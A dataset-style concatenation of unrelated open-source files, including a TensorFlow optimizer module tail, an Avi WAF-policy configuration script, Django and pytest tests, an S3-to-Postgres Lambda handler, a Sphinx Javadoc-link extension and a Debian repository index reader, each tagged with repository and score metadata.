"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
variable = self._add_variable_with_custom_getter(
name=name,
shape=shape,
getter=base_layer_utils.make_variable,
overwrite=True,
initializer=initializer,
dtype=dtype,
trainable=trainable,
use_resource=True,
synchronization=synchronization,
aggregation=aggregation)
backend.track_variable(variable)
return variable
def _assert_valid_dtypes(self, tensors):
"""Asserts tensors are all valid types (see `_valid_dtypes`).
Args:
tensors: Tensors to check.
Raises:
ValueError: If any tensor is not a valid type.
"""
valid_dtypes = self._valid_dtypes()
for t in tensors:
dtype = t.dtype.base_dtype
if dtype not in valid_dtypes:
raise ValueError("Invalid type %r for %s, expected: %s." %
(dtype, t.name, [v for v in valid_dtypes]))
def _valid_dtypes(self):
"""Valid types for loss, variables and gradients.
Subclasses should override to allow other float types.
Returns:
Valid types for loss, variables and gradients.
"""
return set(
[dtypes.float16, dtypes.bfloat16, dtypes.float32, dtypes.float64])
def _call_if_callable(self, param):
"""Call the function if param is callable."""
return param() if callable(param) else param
def _resource_apply_dense(self, grad, handle):
"""Add ops to apply dense gradients to the variable `handle`.
Args:
grad: a `Tensor` representing the gradient.
handle: a `Tensor` of dtype `resource` which points to the variable to be
updated.
Returns:
An `Operation` which updates the value of the variable.
"""
raise NotImplementedError()
def _resource_apply_sparse_duplicate_indices(self, grad, handle, indices):
"""Add ops to apply sparse gradients to `handle`, with repeated indices.
Optimizers which override this method must deal with repeated indices. See
the docstring of `_apply_sparse_duplicate_indices` for details. By default
the correct behavior, to sum non-unique indices and their associated
gradients, is enforced by first pre-processing `grad` and `indices` and
passing them on to `_resource_apply_sparse`. Optimizers which deal correctly
with duplicate indices may instead override this method to avoid the
overhead of summing.
Args:
grad: a `Tensor` representing the gradient for the affected indices.
handle: a `Tensor` of dtype `resource` which points to the variable to be
updated.
indices: a `Tensor` of integral type representing the indices for which
the gradient is nonzero. Indices may be repeated.
Returns:
An `Operation` which updates the value of the variable.
"""
summed_grad, unique_indices = _deduplicate_indexed_slices(
values=grad, indices=indices)
return self._resource_apply_sparse(summed_grad, handle, unique_indices)
def _resource_apply_sparse(self, grad, handle, indices):
"""Add ops to apply sparse gradients to the variable `handle`.
Similar to `_apply_sparse`, the `indices` argument to this method has been
de-duplicated. Optimizers which deal correctly with non-unique indices may
instead override `_resource_apply_sparse_duplicate_indices` to avoid this
overhead.
Args:
grad: a `Tensor` representing the gradient for the affected indices.
handle: a `Tensor` of dtype `resource` which points to the variable to be
updated.
indices: a `Tensor` of integral type representing the indices for which
the gradient is nonzero. Indices are unique.
Returns:
An `Operation` which updates the value of the variable.
"""
raise NotImplementedError()
def _resource_scatter_add(self, x, i, v):
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_add(x.handle, i, v)]):
return x.value()
def _resource_scatter_update(self, x, i, v):
with ops.control_dependencies(
[resource_variable_ops.resource_scatter_update(x.handle, i, v)]):
return x.value()
# ---------------
# For implementing the trackable interface
# ---------------
def _restore_slot_variable(self, slot_name, variable, slot_variable):
"""Restore a newly created slot variable's value."""
variable_key = _var_key(variable)
deferred_restorations = self._deferred_slot_restorations.get(
slot_name, {}).pop(variable_key, [])
# Iterate over restores, highest restore UID first to minimize the number
# of assignments.
deferred_restorations.sort(key=lambda position: position.restore_uid,
reverse=True)
for checkpoint_position in deferred_restorations:
checkpoint_position.restore(slot_variable)
def _create_or_restore_slot_variable(
self, slot_variable_position, slot_name, variable):
"""Restore a slot variable's value, possibly creating it.
Called when a variable which has an associated slot variable is created or
restored. When executing eagerly, we create the slot variable with a
restoring initializer.
No new variables are created when graph building. Instead,
_restore_slot_variable catches these after normal creation and adds restore
ops to the graph. This method is nonetheless important when graph building
for the case when a slot variable has already been created but `variable`
has just been added to a dependency graph (causing us to realize that the
slot variable needs to be restored).
Args:
slot_variable_position: A `trackable._CheckpointPosition` object
indicating the slot variable `Trackable` object to be restored.
slot_name: The name of this `Optimizer`'s slot to restore into.
variable: The variable object this slot is being created for.
"""
variable_key = _var_key(variable)
slot_dict = self._slots.get(variable_key, {})
slot_variable = slot_dict.get(slot_name, None)
if (slot_variable is None and context.executing_eagerly() and
slot_variable_position.is_simple_variable()
# Defer slot variable creation if there is an active variable creator
# scope. Generally we'd like to eagerly create/restore slot variables
# when possible, but this may mean that scopes intended to catch
# `variable` also catch its eagerly created slot variable
# unintentionally (specifically make_template would add a dependency on
# a slot variable if not for this case). Deferring is mostly harmless
# (aside from double initialization), and makes variable creator scopes
# behave the same way they do when graph building.
and not ops.get_default_graph()._variable_creator_stack): # pylint: disable=protected-access
initializer = trackable.CheckpointInitialValue(
checkpoint_position=slot_variable_position)
slot_variable = self.add_slot(
var=variable,
initializer=initializer,
slot_name=slot_name)
# Slot variables are not owned by any one object (because we don't want to
# save the slot variable if the optimizer is saved without the non-slot
# variable, or if the non-slot variable is saved without the optimizer;
# it's a dependency hypergraph with edges of the form (optimizer, non-slot
# variable, variable)). So we don't _track_ slot variables anywhere, and
# instead special-case this dependency and otherwise pretend it's a normal
# graph.
if slot_variable is not None:
# If we've either made this slot variable, or if we've pulled out an
# existing slot variable, we should restore it.
slot_variable_position.restore(slot_variable)
else:
# We didn't make the slot variable. Defer restoring until it gets created
# normally. We keep a list rather than the one with the highest restore
# UID in case slot variables have their own dependencies, in which case
# those could differ between restores.
self._deferred_slot_restorations.setdefault(
slot_name, {}).setdefault(variable_key, []).append(
slot_variable_position)
def _filter_grads(grads_and_vars):
"""Filter out iterable with grad equal to None."""
grads_and_vars = tuple(grads_and_vars)
if not grads_and_vars:
return grads_and_vars
filtered = []
vars_with_empty_grads = []
for grad, var in grads_and_vars:
if grad is None:
vars_with_empty_grads.append(var)
else:
filtered.append((grad, var))
filtered = tuple(filtered)
if not filtered:
raise ValueError("No gradients provided for any variable: %s." %
([v.name for _, v in grads_and_vars],))
if vars_with_empty_grads:
logging.warning(
("Gradients does not exist for variables %s when minimizing the loss."),
([v.name for v in vars_with_empty_grads]))
return filtered
def _var_key(var):
"""Key for representing a primary variable, for looking up slots.
In graph mode the name is derived from the var shared name.
In eager mode the name is derived from the var unique id.
If distribution strategy exists, get the primary variable first.
Args:
var: the variable.
Returns:
the unique name of the variable.
"""
# pylint: disable=protected-access
# Get the distributed variable if it exists.
if getattr(var, "_distributed_container", None) is not None:
var = var._distributed_container()
if var._in_graph_mode:
return var._shared_name
return var._unique_id
def _get_slot_key_from_var(var, slot_name):
"""Get the slot key for the variable: var_name/slot_name."""
name = _var_key(var)
return name + "/" + slot_name
class _RestoredOptimizer(OptimizerV2):
"""A non-functional Optimizer implementation for checkpoint compatibility.
Holds slot variables and hyperparameters when an optimizer is restored from a
SavedModel. These variables may be referenced in functions along with ops
created by the original optimizer, but currently we do not support using the
optimizer object iself (e.g. through `apply_gradients`).
"""
# TODO(allenl): Make the restored optimizer functional by tracing its apply
# methods.
def __init__(self):
super(_RestoredOptimizer, self).__init__("_RestoredOptimizer")
self._hypers_created = True
def get_config(self):
# TODO(allenl): Save and restore the Optimizer's config
raise NotImplementedError(
"Restoring functional Optimzers from SavedModels is not currently "
"supported. Please file a feature request if this limitation bothers "
"you.")
revived_types.register_revived_type(
"optimizer",
lambda obj: isinstance(obj, OptimizerV2),
versions=[revived_types.VersionedTypeRegistration(
object_factory=lambda proto: _RestoredOptimizer(),
version=1,
min_producer_version=1,
min_consumer_version=1,
setter=_RestoredOptimizer._set_hyper # pylint: disable=protected-access
)])
| 1.625 | 2 |
escola/teste_get.py | danielrosendos/djangoRestFramework | 2 | 1179 | <filename>escola/teste_get.py
import requests
headers = {
'content-type': 'application/json',
'Authorization': 'Token <PASSWORD>'
}
url_base_cursos = 'http://127.0.0.1:8000/api/v2/cursos'
url_base_avaliacoes = 'http://127.0.0.1:8000/api/v2/avaliacoes'
resultado = requests.get(url=url_base_cursos, headers=headers)
assert resultado.status_code == 200 | 2.578125 | 3 |
python/avi/sdk/utils/waf_policy/vdi_waf_policy.py | aaronjwood/alb-sdk | 0 | 1180 | <gh_stars>0
# Copyright 2021 VMware, Inc.
import argparse
import json
import re
import logging
import os
import sys
from avi.sdk.avi_api import ApiSession
API_VERSION = "18.2.13"
SYSTEM_WAF_POLICY_VDI='System-WAF-Policy-VDI'
logger = logging.getLogger(__name__)
def add_allowlist_rule(waf_policy_obj):
#add a allowlist rule to allow request with uri beginning with /ice/
allowlist_rule={
"index": 0,
"name": "allowlist-start-with-ice",
"description": "WAF will buffer the whole request body first and then release to backend. With VDI, client wants to stream data between client and server for some URLs like /ice/..., we should allow these URLs",
"actions": [
"WAF_POLICY_WHITELIST_ACTION_ALLOW"
],
"match": {
"path": {
"match_case": "SENSITIVE",
"match_str": [
"/ice/"
],
"match_criteria": "BEGINS_WITH"
}
}
}
index = 0
waf_policy_obj.setdefault("whitelist", {}).setdefault("rules", [])
for rule in waf_policy_obj["whitelist"]["rules"][:]:
if rule["name"] == "allowlist-start-with-ice":
waf_policy_obj["whitelist"]["rules"].remove(rule)
if rule["index"]>index:
index = rule["index"]
allowlist_rule["index"] = index+1
waf_policy_obj["whitelist"]["rules"].append(allowlist_rule)
def get_id_from_group(group):
pattern = re.compile("[^\d]*(?P<group_id>\d\d\d)")
match = pattern.match(group["name"])
assert match, "can not extract group id from group '{}'".format(group["name"])
groupid = int(match.group("group_id"))
assert groupid == 0 or 100 <= groupid <= 999, "group id for group '{}' not in expected range".format(group["name"])
return groupid
def disable_crs_response_rules(waf_policy_obj):
#disable response side rules and some specific rules
for crs_group in waf_policy_obj.get("crs_groups", []):
group_id = get_id_from_group(crs_group)
if group_id >= 950:
crs_group["enable"] = False
for rule in crs_group.get("rules", []):
if rule["rule_id"] == "920330" or rule["rule_id"] == "932105":
rule["enable"] = False
def add_pre_crs_group(waf_policy_obj):
#add a rule to parse body as xml for requests with /broker/xml uri
xml_rule = [
{
"index": 0,
"name": "enforce XML parsing for /broker/xml",
"description": "Clients often send the wrong Content-Type header. We ignore the header and enforce the request body to be parsed as XML in WAF",
"rule": "SecRule REQUEST_METHOD \"@streq POST\" \"phase:1,id:4099822,t:none,nolog,pass,chain\" \n SecRule REQUEST_URI \"@streq /broker/xml\" \"t:none,ctl:requestBodyProcessor=XML\""
}
]
pre_crs_group = {
"index": 0,
"name": "VDI_409_ENFORCE_XML",
"rules": xml_rule
}
index = 0
if "pre_crs_groups" not in waf_policy_obj:
waf_policy_obj["pre_crs_groups"] = list()
for pre_crs in waf_policy_obj["pre_crs_groups"]:
if pre_crs["name"] == "VDI_409_ENFORCE_XML":
pre_crs["rules"] = xml_rule
pre_crs["enable"] = True
return
if pre_crs["index"] > index:
index = pre_crs["index"]
pre_crs_group["index"] = index + 1
waf_policy_obj["pre_crs_groups"].append(pre_crs_group)
def get_crs(api):
tested_crs = "CRS-2021-1"
resp = api.get("wafcrs?name=" + tested_crs)
if resp.status_code not in range(200, 300):
if resp.status_code == 404:
logger.error("Controller does not have CRS %s, please install first." % tested_crs)
return None
logger.error('Error : %s', resp.text)
exit(0)
waf_crs = json.loads(resp.text)["results"]
return waf_crs[0]
def create_vdi_waf_policy(api, args):
waf_policy_obj = {
"name": SYSTEM_WAF_POLICY_VDI,
"mode": "WAF_MODE_DETECTION_ONLY",
"waf_profile_ref": "/api/wafprofile?name=System-WAF-Profile"
}
waf_crs = get_crs(api)
if waf_crs is None:
return
waf_policy_obj["waf_crs_ref"]="/api/wafcrs?name="+waf_crs["name"]
waf_policy_obj["crs_groups"] = list()
for group in waf_crs["groups"]:
waf_policy_obj["crs_groups"].append(group)
add_allowlist_rule(waf_policy_obj)
disable_crs_response_rules(waf_policy_obj)
add_pre_crs_group(waf_policy_obj)
resp = api.post('wafpolicy', data=json.dumps(waf_policy_obj))
if resp.status_code in range(200, 300):
logger.debug('Create WAF policy successfully')
else:
logger.error('Error : %s' % resp.text)
def update_waf_policy(api, args, waf_policy_obj):
add_allowlist_rule(waf_policy_obj)
disable_crs_response_rules(waf_policy_obj)
add_pre_crs_group(waf_policy_obj)
resp = api.put('wafpolicy/%s' %waf_policy_obj['uuid'], data=waf_policy_obj)
if resp.status_code in range(200, 300):
logger.debug('Create WAF policy successfully')
else:
logger.error('Error : %s' % resp.text)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--user', action="store", help='controller user',
default='admin')
parser.add_argument('-p', '--password', action="store", help='controller user password',
default='<PASSWORD>')
parser.add_argument('-t', '--tenant', action="store", help='tenant name',
default='admin')
parser.add_argument('-a', '--authtoken', help='Authentication token')
parser.add_argument('-c', '--controller_ip', action="store", help='controller ip')
args = parser.parse_args()
if args.password:
api = ApiSession.get_session(args.controller_ip, args.user, args.password,
tenant=args.tenant, api_version=API_VERSION)
elif args.authtoken:
api = ApiSession.get_session(args.controller_ip, args.user, tenant=args.tenant,
token=args.authtoken, api_version=API_VERSION)
else:
logging.error("Either password or authtokentoken must be provided.")
sys.exit(1)
waf_policy_obj = api.get_object_by_name('wafpolicy', SYSTEM_WAF_POLICY_VDI)
if not waf_policy_obj:
create_vdi_waf_policy(api, args)
else:
update_waf_policy(api, args, waf_policy_obj)
| 2.328125 | 2 |
src/api/bkuser_core/tests/bkiam/test_constants.py | Chace-wang/bk-user | 0 | 1181 | <reponame>Chace-wang/bk-user
# -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import pytest
from bkuser_core.bkiam.constants import ResourceType
from bkuser_core.categories.models import Department, ProfileCategory
from bkuser_core.tests.utils import make_simple_department
pytestmark = pytest.mark.django_db
class TestResourceTypeEnum:
@pytest.mark.parametrize(
"is_leaf, path, f, v",
[
(True, "/category,5/department,3440/department,3443/", "parent_id", 3443),
(False, "/category,5/department,3440/department,3443/", "id", 3443),
(True, "/category,5/", "category_id", 5),
(False, "/category,5/", "category_id", 5),
(True, "/department,3440/department,3443/", "parent_id", 3443),
(False, "/department,3440/department,3443/", "id", 3443),
],
)
def test_get_key_mapping(self, is_leaf, path, f, v):
key_mapping = ResourceType.get_key_mapping(ResourceType.DEPARTMENT)
path_method = key_mapping["department._bk_iam_path_"]
data = {"value": path}
if not is_leaf:
data["node_type"] = "non-leaf"
f, v = path_method(data)
assert f == f
assert v == v
@pytest.mark.parametrize(
"dep_chain, expected",
[
(
[1000, 1001, 1002],
{"_bk_iam_path_": "/category,1/department,1000/department,1001/department,1002/"},
),
(
[1000],
{"_bk_iam_path_": "/category,1/department,1000/"},
),
],
)
def test_get_attributes_mapping(self, dep_chain, expected):
target_parent = None
for d in dep_chain:
parent_id = target_parent if not target_parent else target_parent.pk
target_parent = make_simple_department(str(d), force_create_params={"id": d}, parent_id=parent_id)
attributes_mapping = ResourceType.get_attributes_mapping(target_parent)
assert attributes_mapping == expected
def test_get_attributes_mapping_other(self):
pc = ProfileCategory.objects.get_default()
attributes_mapping = ResourceType.get_attributes_mapping(pc)
assert attributes_mapping == {}
@pytest.mark.parametrize(
"dep_chain,expected",
[
(
["a", "b", "c"],
[
("category", "默认目录"),
("department", "a"),
("department", "b"),
("department", "c"),
],
),
(
["a", "b"],
[("category", "默认目录"), ("department", "a"), ("department", "b")],
),
],
)
def test_get_resource_nodes_dep(self, dep_chain, expected):
target_parent = None
for d in dep_chain:
parent_id = target_parent if not target_parent else target_parent.pk
target_parent = make_simple_department(d, parent_id=parent_id)
# 只添加 parent,mptt 树需要重建
Department.tree_objects.rebuild()
nodes = ResourceType.get_instance_resource_nodes(target_parent)
assert [(x["type"], x["name"]) for x in nodes] == expected
def test_get_resource_nodes_other(self):
pc = ProfileCategory.objects.get_default()
nodes = ResourceType.get_instance_resource_nodes(pc)
assert [(x["type"], x["name"]) for x in nodes] == [("category", "默认目录")]
| 1.710938 | 2 |
votesim/benchmarks/__init__.py | johnh865/election_sim | 8 | 1182 | <filename>votesim/benchmarks/__init__.py
# from votesim.benchmarks.benchrunner import (
# run_benchmark,
# get_benchmarks,
# post_benchmark,
# plot_benchmark,
# )
from votesim.benchmarks import runtools, simple | 1.117188 | 1 |
src/handler.py | MrIgumnov96/ETL-CloudDeployment | 0 | 1183 | import boto3
import src.app as app
import csv
import psycopg2 as ps
import os
from dotenv import load_dotenv
load_dotenv()
dbname = os.environ["db"]
host = os.environ["host"]
port = os.environ["port"]
user = os.environ["user"]
password = os.environ["pass"]
connection = ps.connect(dbname=dbname,
host=host,
port=port,
user=user,
password=password)
def handle(event, context):
cursor = connection.cursor()
cursor.execute("SELECT 1", ())
print(cursor.fetchall())
# Get key and bucket informaition
key = event['Records'][0]['s3']['object']['key']
bucket = event['Records'][0]['s3']['bucket']['name']
# use boto3 library to get object from S3
s3 = boto3.client('s3')
s3_object = s3.get_object(Bucket = bucket, Key = key)
data = s3_object['Body'].read().decode('utf-8')
all_lines = []
# read CSV
# csv_data = csv.reader(data.splitlines())
# for row in csv_data:
# datestr = row[0] #.replace('/', '-')
# # print(datestr)
# date_obj = datetime.strptime(datestr, '%d/%m/%Y %H:%M')
# # print(date_obj)
# # time = str(row[0][-5:])
# location = str(row[1])
# order = str(row[3])
# total = str(row[4])
# all_lines.append({'date':date_obj, 'location':location, 'order':order, 'total':total})
# return cached_list
# print(all_lines)
app.start_app(all_lines, data)
print_all_lines = [print(line) for line in all_lines]
print_all_lines
return {"message": "success!!! Check the cloud watch logs for this lambda in cloudwatch https://eu-west-1.console.aws.amazon.com/cloudwatch/home?region=eu-west-1#logsV2:log-groups"}
# Form all the lines of data into a list of lists
# all_lines = [line for line in csv_data]
# print(data)
# print(all_lines) | 2.4375 | 2 |
improver_tests/precipitation_type/test_utilities.py | cpelley/improver | 77 | 1184 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# (C) British Crown Copyright 2017-2021 Met Office.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
""" Tests of precipitation_type utilities"""
import numpy as np
import pytest
from iris.exceptions import CoordinateNotFoundError
from improver.metadata.constants import FLOAT_DTYPE
from improver.precipitation_type.utilities import make_shower_condition_cube
from improver.synthetic_data.set_up_test_cubes import set_up_probability_cube
def set_up_test_cube(n_thresholds=1):
"""Set up a cube testing shower condition conversion"""
thresholds = np.arange(n_thresholds)
shape = [2, 2]
shape = [n_thresholds, *shape] if n_thresholds > 0 else shape
data = np.ones(shape, dtype=FLOAT_DTYPE)
cube = set_up_probability_cube(
data,
thresholds,
variable_name="texture_of_cloud_area_fraction",
threshold_units=1,
spatial_grid="equalarea",
)
return cube
def test_basic():
"""Test that with a valid input the cube is transformed into a shower
condition cube."""
cube = set_up_test_cube()
result = make_shower_condition_cube(cube)
threshold_coord = result.coord(var_name="threshold")
assert result.name() == "probability_of_shower_condition_above_threshold"
assert result.dtype == FLOAT_DTYPE
assert (result.data == cube.data).all()
assert threshold_coord.name() == "shower_condition"
assert threshold_coord.units == 1
def test_no_threshold_coord():
"""Test an exception is raised if the proxy diagnostic cube does not have
a threshold coordinate."""
cube = set_up_test_cube()
cube.remove_coord("texture_of_cloud_area_fraction")
expected = "Input has no threshold coordinate and cannot be used"
with pytest.raises(CoordinateNotFoundError, match=expected):
make_shower_condition_cube(cube)
def test_multi_valued_threshold_coord():
"""Test an exception is raised if the proxy diagnostic cube has a multi
valued threshold coordinate."""
cube = set_up_test_cube(n_thresholds=2)
expected = "Expected a single valued threshold coordinate.*"
with pytest.raises(ValueError, match=expected):
make_shower_condition_cube(cube)
| 1.46875 | 1 |
app/api/v1/models/items.py | bryan-munene/Store-Manager-DB | 0 | 1185 | from .db_conn import ModelSetup
class ItemsModel(ModelSetup):
'''Handles the data logic of the items section'''
def __init__(
self,
name=None,
price=None,
quantity=None,
category_id=None,
reorder_point=None,
auth=None):
'''Initializes the variables for the items class'''
self.name = name
self.price = price
self.quantity = quantity
self.category_id = category_id
self.reorder_point = reorder_point
self.auth = auth
def add_item(
self,
name,
price,
quantity,
image,
category_id,
reorder_point,
auth):
'''Adds item given the above arguements. Then returns the created item'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """INSERT INTO items(name, price, quantity, image, category, reorder_point, created_by)\
VALUES(%s,%s,%s,%s,%s,%s,%s);"""
self.cur.execute(
query,
(name,
price,
quantity,
image,
category_id,
reorder_point,
auth))
self.conn.commit()
query_confirm = """SELECT * FROM items WHERE name = %s AND price = %s;"""
self.cur.execute(query_confirm, (name, price))
self.item = self.cur.fetchone()
return self.item
def get_all(self):
'''gets all records of items in the databas and returns them'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items;"""
self.cur.execute(query)
self.items = self.cur.fetchall()
return self.items
def get_by_id(self, item_id):
'''retrieves one item by finding them using their unique item_id'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items WHERE item_id = %s;"""
self.cur.execute(query, (item_id, ))
self.item = self.cur.fetchone()
return self.item
def get_by_category(self, category):
'''retrieves items by finding them using their category. all items in the same category are retrieved'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items WHERE category LIKE %s;"""
self.cur.execute(query, (category))
self.item = self.cur.fetchall()
return self.item
def get_by_name_and_price(self, name, price):
'''retrieves one item by finding them using their unique unique combination'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """SELECT * FROM items WHERE name LIKE %s AND price = %s;"""
self.cur.execute(query, (name, price))
self.item = self.cur.fetchone()
return self.item
def update_item(
self,
item_id,
price,
quantity,
image,
category_id,
reorder_point,
auth):
'''updates item's details. the values in the db are changed to what is provided'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """UPDATE items
SET price = %s, quantity = %s, image = %s, category = %s, reorder_point = %s, created_by = %s
WHERE item_id= %s
"""
self.cur.execute(
query,
(price,
quantity,
image,
category_id,
reorder_point,
auth,
item_id))
self.conn.commit()
query_confirm = """SELECT * FROM items WHERE item_id = %s;"""
self.cur.execute(query_confirm, (item_id, ))
self.item = self.cur.fetchone()
return self.item
def update_item_quantity(self, item_id, quantity):
'''updates item's quantity.adds the quantity added to the quantity available'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """UPDATE items
SET quantity = %s
WHERE item_id= %s
"""
self.cur.execute(query, (quantity, item_id))
self.conn.commit()
query_confirm = """SELECT * FROM items WHERE item_id = %s;"""
self.cur.execute(query_confirm, (item_id, ))
self.item = self.cur.fetchone()
return self.item
def delete_item(self, item_id):
'''deletes an item by finding them using the item_id'''
model = ModelSetup()
self.conn = model.conn
self.cur = model.cur
query = """DELETE FROM items WHERE item_id = %s"""
self.cur.execute(query, (item_id, ))
self.conn.commit()
query_confirm = """SELECT * FROM items;"""
self.cur.execute(query_confirm)
self.items = self.cur.fetchall()
return self.items
| 3.21875 | 3 |
site/src/sphinx/_extensions/api.py | linxGnu/armeria | 0 | 1186 | <reponame>linxGnu/armeria
from docutils.parsers.rst.roles import register_canonical_role, set_classes
from docutils.parsers.rst import directives
from docutils import nodes
from sphinx.writers.html import HTMLTranslator
from sphinx.errors import ExtensionError
import os
import re
def api_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
return api_role_internal(False, role, rawtext, text, lineno, inliner, options, content)
def apiplural_role(role, rawtext, text, lineno, inliner, options={}, content=[]):
return api_role_internal(True, role, rawtext, text, lineno, inliner, options, content)
def api_role_internal(plural, role, rawtext, text, lineno, inliner, options, content):
set_classes(options)
classes = ['code', 'api-reference']
if 'classes' in options:
classes.extend(options['classes'])
node = nodes.literal(rawtext, text, classes=classes, api_reference=True, is_plural=plural)
return [node], []
def api_visit_literal(self, node, next_visitor):
if 'api_reference' not in node.attributes:
return next_visitor(self, node)
env = self.builder.env
javadoc_dir = os.path.abspath(env.config['javadoc_dir'])
# Build the mappings from a simple class name to its Javadoc file.
if not hasattr(env, '__javadoc_cache__'):
env.__javadoc_mappings__ = javadoc_mappings = {}
for dirname, subdirs, files in os.walk(javadoc_dir):
for basename in files:
if re.match(r'^[^A-Z]', basename) or not basename.endswith('.html'):
# Ignore the non-class files. We rely on the simple assumption that
# a class name always starts with an upper-case English alphabet.
continue
simple_class_name = basename[:-5].replace('.', '$')
javadoc_mappings[simple_class_name] = os.path.relpath(dirname, javadoc_dir) \
.replace(os.sep, '/') + '/' + basename
else:
javadoc_mappings = env.__javadoc_mappings__
text = node.astext()
if text.startswith('@'):
text = text[1:]
is_annotation = True
else:
is_annotation = False
if text.find('.') != -1:
# FQCN or package name.
if re.fullmatch(r'^[^A-Z$]+$', text):
# Package
uri = text.replace('.', '/') + '/package-summary.html'
else:
# Class
uri = text.replace('.', '/').replace('$', '.') + '.html'
text = re.sub(r'^.*\.', '', text).replace('$', '.')
else:
# Simple class name; find from the pre-calculated mappings.
if text not in javadoc_mappings:
raise ExtensionError('Cannot find a class from Javadoc: ' + text)
uri = javadoc_mappings[text]
text = text.replace('$', '.')
# Prepend the frame index.html path.
uri = os.path.relpath(javadoc_dir, env.app.outdir).replace(os.sep, '/') + '/index.html?' + uri
# Prepend the '@' back again if necessary
if is_annotation:
text = '@' + text
# Emit the tags.
self.body.append(self.starttag(node, 'code', suffix='', CLASS='docutils literal javadoc'))
self.body.append(self.starttag(node, 'a', suffix='', CLASS='reference external javadoc', HREF=uri))
self.body.append(text + '</a>')
# Append a plural suffix.
if node.attributes['is_plural']:
self.body.append(self.starttag(node, 'span', suffix='', CLASS='plural-suffix'))
if re.fullmatch(r'^.*(ch|s|sh|x|z)$', text):
self.body.append('es')
else:
self.body.append('s')
self.body.append('</span>')
self.body.append('</code>')
raise nodes.SkipNode
def setup(app):
app.add_config_value('javadoc_dir', os.path.join(app.outdir, 'apidocs'), 'html')
# Register the 'javadoc' role.
api_role.options = {'class': directives.class_option}
register_canonical_role('api', api_role)
register_canonical_role('apiplural', apiplural_role)
# Intercept the rendering of HTML literals.
old_visitor = HTMLTranslator.visit_literal
HTMLTranslator.visit_literal = lambda self, node: api_visit_literal(self, node, old_visitor)
pass
| 2.171875 | 2 |
feaas/runners/__init__.py | tsuru/varnishapi | 3 | 1187 | # Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import time
from feaas import storage
class Base(object):
def __init__(self, manager, interval, *locks):
self.manager = manager
self.storage = manager.storage
self.interval = interval
def init_locker(self, *lock_names):
self.locker = storage.MultiLocker(self.storage)
for lock_name in lock_names:
self.locker.init(lock_name)
def loop(self):
self.running = True
while self.running:
self.run()
time.sleep(self.interval)
def stop(self):
self.running = False
| 2.359375 | 2 |
ros_buildfarm/debian_repo.py | j-rivero/ros_buildfarm | 0 | 1188 | # Copyright 2014 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
from .common import PlatformPackageDescriptor
from .http_cache import fetch_and_cache_gzip
def get_debian_repo_index(debian_repository_baseurl, target, cache_dir):
url = os.path.join(
debian_repository_baseurl, 'dists', target.os_code_name, 'main')
if target.arch == 'source':
url = os.path.join(url, 'source', 'Sources.gz')
else:
url = os.path.join(url, 'binary-%s' % target.arch, 'Packages.gz')
cache_filename = fetch_and_cache_gzip(url, cache_dir)
logging.debug('Reading file: %s' % cache_filename)
# split package blocks
with open(cache_filename, 'rb') as f:
blocks = f.read().decode('utf8').split('\n\n')
blocks = [b.splitlines() for b in blocks if b]
# extract version number of every package
package_versions = {}
for lines in blocks:
prefix = 'Package: '
assert lines[0].startswith(prefix)
debian_pkg_name = lines[0][len(prefix):]
prefix = 'Version: '
versions = [l[len(prefix):] for l in lines if l.startswith(prefix)]
